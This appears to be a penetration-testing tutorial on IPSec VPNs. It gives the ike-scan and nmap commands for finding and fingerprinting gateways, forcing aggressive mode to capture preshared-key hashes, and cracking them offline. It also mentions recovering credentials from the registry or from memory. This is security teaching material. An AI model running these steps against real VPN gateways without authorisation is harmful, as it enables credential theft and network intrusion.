In this article we are going to discuss Penetration Testing IPSec VPN (Virtual Private Network). VPN provide secure (encrypted) communications between remote locations or users within the same network through internet. Basically there are two types of VPNs: IPSec VPN and SSL VPN. IPSec is widely used protocol to establish secure connections between networks and connect hosts in virtual private networks.
Within IPSec VPN, there are many subsidiary protocols are responsible to perform specific tasks or functions, I have described them below:
- Authentication Header (AH): The function of AH is to provide proof of origin for IP packets, protecting them against replay attacks.
- Encapsulation Security Protocol (ESP): Task of ESP is to provide the origin authenticity, integrity, and confidentiality of the transmitted data.
- Security Association (SA): Basically SA is the set of algorithms which is used to encrypt and authenticate the transmitted data. Because SA is associated with data transmission in one direction, two-way communications are secured by a pair of security associations. Security associations are established using Internet Security Association and Key Management Protocol (ISAKMP), this can be applied through many ways. When testing the security of VPN (Penetration Testing IPSec VPN), one of the most vulnerable configurations relies on preshared secrets, Internet Key Exchange (IKE).
To assess the security of VPN (Penetration Testing IPSec VPN), Penetration testers should follow the following basic steps:
- Scanning VPN gateways.
- Fingerprinting VPN gateways (determine vendor and configuration details).
- Finding vulnerabilities associated with the VPN vendor or related products.
- Capturing preshared keys.
- PSK cracking (offline).
- Checking for default user accounts.
Scanning for VPN gateways – Penetration Testing IPSec VPN
To scan for the presence of VPN gateways, use nmap or ike-scan. To use nmap, issue the following command:
[email protected]@:~# nmap -sU -Pn -p 500 <IP Address>
Explaining the above command,
- -sU forces nmap to scan the host range for possible targets using UDP packets (instead of TCP),.
- -Pn ensures that nmap will not send a ping scan (which can alert the target about the scan and identify the tester).
- -p 500 identifies the specific port to be scanned.
We all know the power of Nmap tool the most effective tool is the one that sends a correctly formatted IKE packet to the target system and displays the returned message but this tool does not locate all VPN gateways due to how it handles the IKE packets.
The best tool to locate a VPN gateway is ike-scan which can be found by navigating to Kali Linux | Information Gathering | ike-scan (might be preinstalled in Parrot OS). This command-line tool uses the IKE protocol to discover and fingerprint private networks. It also supports preshared key cracking in the IKE aggressive mode. To use ike-scan to locate targets, issue the following command:
[email protected]@:~# ike-scan -M <Target IP>
The execution of the above command is shown in the following screenshot:
- 0 returned handshake; 0 returned notify: This indicates that the target is not an IPSec gateway.
- 0 returned handshake; 1 returned notify: This indicates that although a VPN gateway is present, none of the transforms provided to it by ike-scan are acceptable.
- 1 returned handshake; 0 returned notify: As shown in the previous screenshot, this indicates that the target is configured for IPSec and will perform an IKE negotiation against one or more of the transforms that have been provided to it.
Fingerprinting the VPN gateway – Penetration Testing IPSec VPN
If you can establish a handshake with the VPN gateway, you can conduct the fingerprinting of the device to return the following information:
- vendor/manufacturer and model
- software version
Information obtained used to identify a vendor-specific attack or fine tune a generic attack. If VPN is hosted by a firewall, the fingerprinting will also identify the firewall in use.
The main reason is IKE does not guarantee the reliability for packets transmitted, most VPN gateway vendors use a proprietary protocol to deal with traffic that appears to be lost. This tool sends IKE probe packets to the VPN gateway, but it does not reply to the response that it receives. The server responds as if the packets have been lost and implements its backoff strategy to resend the packets. By analyzing the time difference between the packets and the amount of retries, ike-scan can fingerprint the vendor.
Following screenshot explains the process, the -M option causes each payload to be shown on a separate line, making the output easier to read. -showbackoff option (as shown in the following screenshot) of ike-scan records the response time of all the packets that were sent and received and then records the delays for 60 seconds before displaying the results:
This tool can also be used to determine whether the gateway supports the aggressive mode. If it does, it can be difficult to establish the handshake with the server, because it will not respond until a valid ID is supplied as part of the identification payload.
Capturing pre-shared keys – Penetration Testing IPSec VPN
ike-scan tool can be used to push a VPN gateway into aggressive mode. This is significant because the aggressive mode of IPSec does not protect the preshared keys. The authentication credentials are sent as clear text, which can be captured and then cracked using offline tools.
To issue this against a Cisco VPN concentrator, use the following command:
[email protected]@:~# ike-scan –pskcrack –aggressive –id=peer <target>
following screenshot explains the process executed by command:
For offline password cracking and further analysis, use the following command:
[email protected]@:~# ike-scan -M -A -Ppsk-hash -d <target>
Performing offline PSK cracking – Penetration Testing IPSec VPN
Before cracking the captured hash of the preshared key using an offline tool, edit the output file to include only the hash value (it should contain nine colon-separated values). The most effective tool to crack the key is psk-crack, which supports the dictionary, brute force, and hybrid-mode cracking:
Like all offline cracking exercises, success is a measure of the work and the effort involved (the time, computational effort, and investment of energy on power systems). A strong preshared key, such as the one shown in the previous screenshot, will take a long time to crack.
Identify default user accounts – Penetration Testing IPSec VPN
Like most other hardware devices, VPN gateways usually contain default user accounts at the time of installation. These may not be changed by the administrator. Using the information gathered during the fingerprinting process, a penetration tester can conduct a web search to identify the standard user accounts.
If the tester has access to a user’s computer, the username credential is usually stored as plaintext in the system registry. Furthermore, if a tester has access to a system’s memory, it is possible to obtain the password directly from the client system’s memory dump. VulnVPN is a virtual operating system and vulnerable VPN server. It allows you to apply the tools described in this article to compromise the application and gain root access without damaging a production system.